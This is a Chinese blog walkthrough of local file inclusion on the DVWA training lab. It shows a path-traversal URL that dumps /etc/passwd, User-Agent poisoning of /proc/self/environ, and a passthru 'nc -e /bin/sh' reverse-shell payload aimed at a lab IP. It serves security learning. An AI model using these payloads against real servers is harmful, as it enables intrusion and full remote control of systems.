Dvwa漏洞之 local file inclusion 本地文件包含

已于 2022-04-10 23:40:21 修改
阅读量3.5k 收藏 2
点赞数
分类专栏: Security 文章标签: 漏洞发掘 本地文件包含
于 2022-04-10 22:08:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/quandaquan/article/details/124081832
版权

local file inclusion允许攻击者读取同一台服务器上的任何文件

  • 访问www目录外的文件
  • 如果用户账号密码保存在某个文件里,就可以读了,这个是很危险的
  • 如果多个网站部署在一台服务器上,通过a网站的此漏洞,就可以访问B网站的文件,从而进一步实施攻击

来看下具体的例子把

点击file inclusion,可以看到url是这个样子的,

file inclusion 的url是这个样子的,XXX/?page=include.PHP

试试以下输入url,可以看到error,从报错中可见这个路径文件是存在的。

我们知道一般服务器上存在/etc/passwd文件,所以我们试图获取这个文件的内容,从而进一步获取更多文件,加以利用。

通过构造url:XXXX../../../找到目标的路径

http://192.168.254.129/dvwa/vulnerabilities/fi/?page=/../../../../../etc/passwd

 这样我们就获取了该文件的内容

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false postfix:x:106:115::/var/spool/postfix:/bin/false ftp:x:107:65534::/home/ftp:/bin/false postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false distccd:x:111:65534::/:/bin/false user:x:1001:1001:just a user,111,,:/home/user:/bin/bash service:x:1002:1002:,,,:/home/service:/bin/bash telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false

这样就可以获取www目标外的文件了。至此就有机会获取目标机器的完全控制权了

这个时候我们security设置的为low或者medium

更进一步,本地文件中包含shell

构造url,来查看环境变量的文件

http://192.168.254.129/dvwa/vulnerabilities/fi/?page=/../../../../../proc/self/environ

可以看到user_AGENT 就是用户浏览器的信息,有信息是可以写到服务器端的

通过burp,修改这个值

改成php函数,phpinfo

 效果是这样的,可以查看php信息

还可以把这个值改为命令

passthru("nc -e /bin/sh 192.168.254.129 8888");

关于passthru

(PHP 4, PHP 5, PHP 7, PHP 8)

passthru — 执行外部程序并且显示原始输出

说明

passthru(string $command, int &$result_code = null): ?bool

同 exec() 函数类似, passthru() 函数 也是用来执行外部命令(command)的。 当所执行的 Unix 命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数来替代 exec() 或 system() 函数。 常用来执行诸如 pbmplus 之类的可以直接输出图像流的命令。 通过设置 Content-type 为 image/gif, 然后调用 pbmplus 程序输出 gif 文件, 就可以从 PHP 脚本中直接输出图像到浏览器。

同时在攻击服务器上监听该端口8888,就可以获得完全访问控制权限了

这就是通过注入代码实现的

以上

犬大犬小
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全 // 文件包含漏洞File Inclusion
qq_45805420的博客
07-30 760
前言 本题的考察点为 PHP 的 文件包含漏洞File Inclusion)。      说起来,这是第一次尝试正经的 CTF 比赛,虽然吧一题也没做出来,但总归也是有所收获。路漫漫其修远兮,吾将上下而求索。Go Fight ! ...
Wechall PHP - Local File Inclusion
weixin_44024162的博客
05-14 259
Wechall PHP - Local File Inclusion 本地文件包含(Local File Inclusion) 本地文件包含(LFI)类似于远程文件包含漏洞,但不包括远程文件,只能包括当前服务器上的本地文件(即执行中的文件)。此问题仍可以通过包含包含攻击者控制的数据(如 Web 服务器的访问日志)的文件来导致远程代码执行。 题目 wechall的LFI题 分析 题目要求为显示 …/solution.php 文件 相关代码: GeSHi`ed PHP code $filename =
WeChall_PHP-Local File Inclusion(LFI)
1stPeak's Blog
09-16 511
PHP - Local File Inclusion(LFI) 题目: 中文翻译如下: 核心代码: $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html'; include $filename; 代码详解: 当要 判断一个变量是否已经声明的时候 可以使用 isset 函数 判断表达式是否成立?表...
FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution
cnbird's blog
09-30 1577
Security Advisory FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution Researcher Information Discovered by: Giuseppe `Zmax` Fuggiano Website: http://www.giusef.net Conta
DVWAFile Inclusion
qq_43665434的博客
03-01 199
DVWAFile Inclusion 一、low级别 1、测试流程 (1)local 发现文件名是通过url传递的 于是尝试更改page参数内容 替换为:..\..\..\..\..\..\..\..\password.txt 如图所示,成功爆出根目录下password.txt文件下的内容,此为本地文件包含。 (2)remote 搭建一个站点,写入一个木马文件 将page参数内容替换为木马文件的url地址 加上参数x,传入cmd命令: http://10.245.3.237/dvwa/vulner
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
web网站文件包含漏洞和攻击-运维安全详细笔记总结
最新发布
06-30
文件包含漏洞可以分为本地文件包含漏洞和远程文件包含漏洞两种。 文件包含漏洞的攻击步骤: 1. 准备有文件上传漏洞的网站 2. 客户端浏览器利用本地包含文件漏洞进行攻击 a) 使用正常合法的小图片,使用工具插入...
DVWA漏洞测试平台分析.v1.0.zip
03-12
这个平台包含了各种常见的Web应用漏洞,如SQL注入、XSS跨站脚本、文件包含、命令注入等,让使用者能够在可控环境中学习和实践网络安全攻防技术。 在《DVWA漏洞测试平台分析.v1.0》中,我们将深入探讨这些漏洞的原理...
DVWA漏洞测试平台分析.v1.0-by 红日安全Silense.pdf
01-30
DVWA漏洞测试PDF由红日安全组组长Silense编写,从dvwa漏洞平台的搭建到各个漏洞低中高类型分析,特别是使用了python脚本来利用漏洞
php Local File Inclusion的利用方法汇总
note.txt
03-29 710
<br />看的国外的一个paper ,总结一下(截断统一不考虑):<br />1. 包含上传好的文件,jpg、txt、rar等允许的文件。<br />2. 包含各种日志。<br />3. 使用php wrapper,例如php://input、php://filter、data://等。<br />4. 包含 /proc/self/environ ,不熟悉linux,这个就靠大家了。<br />5. 包含SESSION文件,php保存格式 sess_SESSIONID  默认位置是/tmp/和c:/wi
DVWA文件包含
giun的博客
03-09 4980
一、前置知识 1、什么是文件包含 一种代码处理方法,函数如include,require等,参数是文件名。 2、文件包含漏洞 文件名的参数用户可控且过滤不严,被攻击者偷梁换柱 二、尝试low等级 打开文件包含题目会发现以下提示,我们找到php.ini配置文件(一般在安装目录里),把 allow_url_include的值改成on,然后重启phpstudy即可 The PHP function a...
DVWA —— File Inclusion 文件包含
YouTheFreedom的博客
05-22 1538
web 程序中引入一段用户能控制的脚本或代码,并让服务器端执行 include() 等函数通过动态变量的方式引入需要包含的文件,用户能够控制该动态变量,实现本地文件包含或者远程文件包含
CTF-rootme 题解之Local File Inclusion - Double encoding
weixin_30478923的博客
03-21 588
LINK:https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding    http://challenge01.root-me.org/web-serveur/ch45/ 本题考察的是本地文件包含漏洞和URL编码,而且是二次编码。 查看链接如下: http://challeng...
DVWA_文件包含_中级+高级绕过方法
sx234com的博客
04-09 1866
1、中级 代码如下: 代码是过滤http://与https:// 的代码为"" 绕过思路: 构造绕过结构:例如 hthttp://tp:// 中间被代替成""后 剩下的字符任然是 http:// 成功绕过。 ...
DVWA(4)文件包含(File Inclusion) LOW-HIGHT 操作记录
lllllaaa111的博客
11-08 730
今天带来第四期文件包含漏洞操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。当被包含的文件在服务器本地时,就形成本地文件包含当被包含的文件在第三方服务器时,叫做远程文件包含
mysql 流读取文件_MySQL之文件读取
weixin_34254083的博客
02-07 912
读取服务端文件读取文件利用方式load_file()select load_file('/etc/passwd')load data infile() 利用该函数读文件时需要将文件内容保存至一个表中,在方便查看结果的情况下,一般最好自己创建一个新表来保存查询的结果。-- 创建存储结果的表create table result(cmd text);-- 读取文件内容到表中load data infi...
LFI(本地文件包含)、RFI(远程文件包含)、PHP封装协议(伪协议)安全问题学习
weixin_45116657的博客
02-04 2438
友情链接:https://www.cnblogs.com/LittleHann/p/3665062.html 目录 一、文件包含的基本概念 1、要想成功利用文件包含漏洞,需要满足下面的条件 (1)include()等函数通过动态变量的方式引入需要包含的文件 (2)用户能够控制该动态变量 二、LFI(Local File Include)本地文件包含 1、00字符截断 防御方法: ...
File Inclusion--文件包含漏洞
qq_17762247的博客
05-27 716
一、简介 为了提高代码的复用性,开发人员往往将业务功能封装成模块放入一个文件中,需要的时候包含对应的文件即可。如果包含者为对被包含的文件进行检查,那么很有可能造成灾难性的后果。 File Inclusion分为LFI(Local File Inclusion,本地文件包含)和RFI(Remote File Inclusion,远程文件包含),LFI指使用文件包含函数包含执行本地(Web应用所在主机)文件,利用LFI可以查看系统任意文件内容,如果具备一些条件,也可以执行命令;RFI需要一定的条件,以PHP应用
dvwa file inclusionfile upload
05-12
DVWA(Damn Vulnerable Web Application)是一个用于演示Web应用程序安全漏洞的教育性平台。其中包括文件包含File Inclusion)和文件上传(File Upload)两种漏洞文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感文件。攻击者可以通过这种方式获取服务器上的重要信息,甚至能够获取Web应用程序的所有权限。 文件上传漏洞是指Web应用程序未对上传的文件进行充分验证和过滤,导致攻击者能够上传恶意文件并执行任意代码。攻击者可以通过这种方式获取服务器上的敏感信息、修改文件内容,甚至能够控制整个Web应用程序。 在DVWA中,可以通过模拟这两种漏洞,来帮助开发者、安全研究人员和测试人员了解和学习如何发现和修复这些漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值